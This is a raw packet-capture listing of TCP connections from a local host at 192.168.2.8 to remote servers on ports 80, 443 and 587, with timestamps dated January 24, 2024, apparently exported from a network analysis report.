                                                                Jan 24, 2024 09:02:39.264647961 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264658928 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264661074 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264674902 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264688015 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264698029 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264703035 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264715910 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264729977 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264748096 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264750004 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264750004 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264750004 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264760971 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264766932 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264775038 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264786005 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264786959 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264801979 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264816999 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264816999 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264830112 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264832020 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264842987 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264858961 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264866114 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264868975 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264868975 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264873028 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264898062 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264909983 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.264983892 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.264997005 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265008926 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265022993 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265033960 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265034914 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265052080 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265064955 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265072107 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265072107 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265079975 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265091896 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265094042 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265100956 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265105009 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265108109 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265120029 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265126944 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265135050 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265142918 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265147924 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265155077 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265161037 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265166998 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265168905 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265173912 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265186071 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265193939 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265201092 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.265222073 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.265234947 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395216942 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395284891 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395286083 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395328999 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395730972 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395780087 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395797014 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395809889 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395821095 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395832062 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395834923 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395838976 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.395847082 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395864964 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.395885944 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396066904 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396080017 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396090984 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396109104 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396116018 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396120071 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396121979 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396126986 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396130085 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396136999 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396148920 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396152020 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396159887 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396171093 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396173000 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396182060 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396184921 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396194935 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396208048 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396219015 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396224022 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396224022 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396229982 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396240950 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396254063 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396259069 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396265030 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396275997 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396285057 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396286964 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396296978 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396300077 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396310091 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396320105 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396322966 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396332026 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396333933 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396347046 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396353960 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396358967 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396369934 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396374941 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396383047 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396395922 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396400928 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396406889 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396420002 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396424055 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396431923 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396440983 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396442890 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396452904 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396456003 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396473885 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396495104 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396555901 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396567106 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396576881 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396594048 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396604061 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396605015 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396610975 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396624088 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396624088 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396635056 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396652937 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396655083 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396663904 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396667957 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396678925 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396680117 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396691084 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396703959 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396704912 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396711111 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396716118 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396727085 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396739006 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396739006 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396750927 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396754026 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396760941 CET8049708172.96.14.41192.168.2.8
Jan 24, 2024 09:02:39.396771908 CET  49708  80  192.168.2.8  172.96.14.41
Jan 24, 2024 09:02:39.396771908 CET  80  49708  172.96.14.41  192.168.2.8
Jan 24, 2024 09:02:39.396784067 CET  80  49708  172.96.14.41  192.168.2.8
Jan 24, 2024 09:02:39.396784067 CET  49708  80  192.168.2.8  172.96.14.41
Jan 24, 2024 09:02:39.396795988 CET  80  49708  172.96.14.41  192.168.2.8
Jan 24, 2024 09:02:39.396806955 CET  80  49708  172.96.14.41  192.168.2.8
Jan 24, 2024 09:02:39.396807909 CET  49708  80  192.168.2.8  172.96.14.41
Jan 24, 2024 09:02:39.396816969 CET  80  49708  172.96.14.41  192.168.2.8
Jan 24, 2024 09:02:39.396821976 CET  49708  80  192.168.2.8  172.96.14.41
Jan 24, 2024 09:02:39.396828890 CET  80  49708  172.96.14.41  192.168.2.8
Jan 24, 2024 09:02:39.396842003 CET  80  49708  172.96.14.41  192.168.2.8
Jan 24, 2024 09:02:39.396846056 CET  49708  80  192.168.2.8  172.96.14.41
Jan 24, 2024 09:02:39.396869898 CET  49708  80  192.168.2.8  172.96.14.41
Jan 24, 2024 09:02:39.396879911 CET  49708  80  192.168.2.8  172.96.14.41
Jan 24, 2024 09:02:39.830533028 CET  49709  443  192.168.2.8  104.237.62.211
Jan 24, 2024 09:02:39.830568075 CET  443  49709  104.237.62.211  192.168.2.8
Jan 24, 2024 09:02:39.830634117 CET  49709  443  192.168.2.8  104.237.62.211
Jan 24, 2024 09:02:39.839170933 CET  49709  443  192.168.2.8  104.237.62.211
Jan 24, 2024 09:02:39.839184999 CET  443  49709  104.237.62.211  192.168.2.8
Jan 24, 2024 09:02:40.340959072 CET  443  49709  104.237.62.211  192.168.2.8
Jan 24, 2024 09:02:40.341053009 CET  49709  443  192.168.2.8  104.237.62.211
Jan 24, 2024 09:02:40.343456984 CET  49709  443  192.168.2.8  104.237.62.211
Jan 24, 2024 09:02:40.343476057 CET  443  49709  104.237.62.211  192.168.2.8
Jan 24, 2024 09:02:40.343883038 CET  443  49709  104.237.62.211  192.168.2.8
Jan 24, 2024 09:02:40.421967030 CET  49709  443  192.168.2.8  104.237.62.211
Jan 24, 2024 09:02:40.469902992 CET  443  49709  104.237.62.211  192.168.2.8
Jan 24, 2024 09:02:40.665656090 CET  443  49709  104.237.62.211  192.168.2.8
Jan 24, 2024 09:02:40.665730953 CET  443  49709  104.237.62.211  192.168.2.8
Jan 24, 2024 09:02:40.666084051 CET  49709  443  192.168.2.8  104.237.62.211
Jan 24, 2024 09:02:40.669413090 CET  49709  443  192.168.2.8  104.237.62.211
Jan 24, 2024 09:02:41.272687912 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:41.376209021 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:41.376291037 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:41.778280020 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:41.778526068 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:41.882533073 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:41.882740974 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:41.987493992 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:41.989528894 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:42.108341932 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.108464003 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.108504057 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.108549118 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.108591080 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.108655930 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:42.142764091 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:42.246912956 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.253002882 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:42.357495070 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.357932091 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:42.462764025 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.465533972 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:42.609932899 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.691720963 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.695971012 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:42.799221039 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.799575090 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.799902916 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:42.944058895 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.954118013 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:42.954541922 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:43.058346033 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:43.058465958 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:43.059195042 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:43.059195042 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:43.059268951 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:43.059268951 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:43.162655115 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:43.163671017 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:43.210230112 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:43.313704967 CET  587  49710  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:43.314203978 CET  49710  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:43.315341949 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:43.418538094 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:43.418627977 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:43.975681067 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:43.975857019 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:44.079713106 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.079909086 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:44.184500933 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.184878111 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:44.303756952 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.303792000 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.303805113 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.303817987 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.303831100 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.303843975 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:44.303874016 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:44.305880070 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:44.410326958 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.413264990 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:44.517379999 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.519120932 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:44.625838995 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.626211882 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:44.732902050 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.733201981 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:44.836882114 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.837115049 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:44.975397110 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:44.975608110 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:45.079330921 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:45.087014914 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:45.087014914 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:45.087049007 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:45.087071896 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:45.087116957 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:45.087155104 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:45.087198973 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:45.087233067 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:45.087261915 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:45.087290049 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:02:45.190313101 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:45.190337896 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:45.190368891 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:45.190758944 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:45.191349983 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:02:45.232558012 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:03:09.014065981 CET  49704  80  192.168.2.8  72.21.81.240
Jan 24, 2024 09:03:09.116992950 CET  80  49704  72.21.81.240  192.168.2.8
Jan 24, 2024 09:03:09.117172003 CET  49704  80  192.168.2.8  72.21.81.240
Jan 24, 2024 09:04:12.093750000 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:12.197213888 CET  587  49711  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:12.197663069 CET  49711  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:12.198769093 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:12.301790953 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:12.301877022 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:12.742486000 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:12.742635012 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:12.846515894 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:12.846812963 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:12.952048063 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:12.952495098 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.065694094 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.065747976 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.065785885 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.065815926 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.065860033 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.065931082 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.065946102 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.073196888 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.177299976 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.178500891 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.282418966 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.282630920 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.387057066 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.387403011 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.531976938 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.612850904 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.617685080 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.721173048 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.721465111 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.721723080 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.866820097 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.869822979 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.870102882 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.973743916 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.973771095 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:13.974059105 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.974102974 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.974163055 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.974221945 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:13.975385904 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:14.077594995 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:14.079003096 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:14.079181910 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:14.183053970 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:14.185168982 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:14.288762093 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:14.289555073 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:14.289712906 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:14.393306971 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:14.393338919 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:14.393644094 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:14.394695997 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:14.435631990 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:28.343238115 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:28.435950994 CET  49708  80  192.168.2.8  172.96.14.41
Jan 24, 2024 09:04:28.447159052 CET  587  49713  192.185.148.49  192.168.2.8
Jan 24, 2024 09:04:28.447609901 CET  49713  587  192.168.2.8  192.185.148.49
Jan 24, 2024 09:04:28.447927952 CET  49714  587  192.168.2.8  192.185.148.49
